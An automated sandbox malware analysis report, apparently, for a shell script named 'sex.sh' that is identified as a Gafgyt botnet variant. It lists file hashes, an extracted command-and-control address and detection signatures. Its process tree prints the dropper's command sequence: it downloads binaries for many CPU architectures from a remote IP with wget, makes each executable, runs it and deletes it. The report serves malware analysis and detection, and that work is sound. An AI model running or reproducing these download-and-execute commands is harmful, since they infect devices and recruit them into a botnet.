Analysis
-
max time kernel
145s -
max time network
172s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04/08/2024, 13:39
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
4a5211253d90ad66dea73ffa8809bbd8
-
SHA1
27c91298804fd2e46e280d4259170e6a48e4280d
-
SHA256
bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
-
SHA512
a844fe1fdd89254ff069b0bc3fa3b5812936f9560f693cd6c5658f4232f42efc9e926a3d51bd152a16283c8ab322967f6f7686f536ea395047477661b9aad0eb
Malware Config
Extracted
gafgyt
5.252.177.70:23
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_gafgyt -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/arm61 731 arm61 -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 731 arm61 -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/arm61 wget
Processes
-
/tmp/sex.sh/tmp/sex.sh1⤵PID:668
-
/usr/bin/wgetwget http://216.172.177.16/mips2⤵PID:670
-
-
/bin/chmodchmod +x mips2⤵PID:687
-
-
/tmp/mips./mips2⤵PID:689
-
-
/bin/rmrm -rf mips2⤵PID:690
-
-
/usr/bin/wgetwget http://216.172.177.16/mipsel2⤵PID:693
-
-
/bin/chmodchmod +x mipsel2⤵PID:700
-
-
/tmp/mipsel./mipsel2⤵PID:701
-
-
/bin/rmrm -rf mipsel2⤵PID:702
-
-
/usr/bin/wgetwget http://216.172.177.16/sh42⤵PID:703
-
-
/bin/chmodchmod +x sh42⤵PID:705
-
-
/tmp/sh4./sh42⤵PID:706
-
-
/bin/rmrm -rf sh42⤵PID:707
-
-
/usr/bin/wgetwget http://216.172.177.16/x862⤵PID:708
-
-
/bin/chmodchmod +x x862⤵PID:709
-
-
/tmp/x86./x862⤵PID:710
-
-
/bin/rmrm -rf x862⤵PID:711
-
-
/usr/bin/wgetwget http://216.172.177.16/arm612⤵
- Writes file to tmp directory
PID:712
-
-
/bin/chmodchmod +x arm612⤵PID:729
-
-
/tmp/arm61./arm612⤵
- Executes dropped EXE
- Changes its process name
PID:731
-
-
/bin/rmrm -rf arm612⤵PID:734
-
-
/usr/bin/wgetwget http://216.172.177.16/i6862⤵PID:736
-
-
/bin/chmodchmod +x i6862⤵PID:743
-
-
/tmp/i686./i6862⤵PID:745
-
-
/bin/rmrm -rf i6862⤵PID:746
-
-
/usr/bin/wgetwget http://216.172.177.16/ppc2⤵PID:747
-
-
/bin/chmodchmod +x ppc2⤵PID:755
-
-
/tmp/ppc./ppc2⤵PID:757
-
-
/bin/rmrm -rf ppc2⤵PID:758
-
-
/usr/bin/wgetwget http://216.172.177.16/5862⤵PID:759
-
-
/bin/chmodchmod +x 5862⤵PID:768
-
-
/tmp/586./5862⤵PID:771
-
-
/bin/rmrm -rf 5862⤵PID:773
-
-
/usr/bin/wgetwget http://216.172.177.16/m68k2⤵PID:774
-
-
/bin/chmodchmod +x m68k2⤵PID:778
-
-
/tmp/m68k./m68k2⤵PID:780
-
-
/bin/rmrm -rf m68k2⤵PID:781
-
-
/usr/bin/wgetwget http://216.172.177.16/dc2⤵PID:782
-
-
/bin/chmodchmod +x dc2⤵PID:783
-
-
/tmp/dc./dc2⤵PID:784
-
-
/bin/rmrm -rf dc2⤵PID:785
-
-
/usr/bin/wgetwget http://216.172.177.16/dss2⤵PID:786
-
-
/bin/chmodchmod +x dss2⤵PID:792
-
-
/tmp/dss./dss2⤵PID:794
-
-
/bin/rmrm -rf dss2⤵PID:795
-
-
/usr/bin/wgetwget http://216.172.177.16/co2⤵PID:796
-
-
/bin/chmodchmod +x co2⤵PID:803
-
-
/tmp/co./co2⤵PID:805
-
-
/bin/rmrm -rf co2⤵PID:806
-
-
/usr/bin/wgetwget http://216.172.177.16/scar2⤵PID:808
-
-
/bin/chmodchmod +x scar2⤵PID:814
-
-
/tmp/scar./scar2⤵PID:816
-
-
/bin/rmrm -rf scar2⤵PID:817
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136KB
MD56820e48a7c8f9b287da8f0593b0a8f83
SHA14e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA5120dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c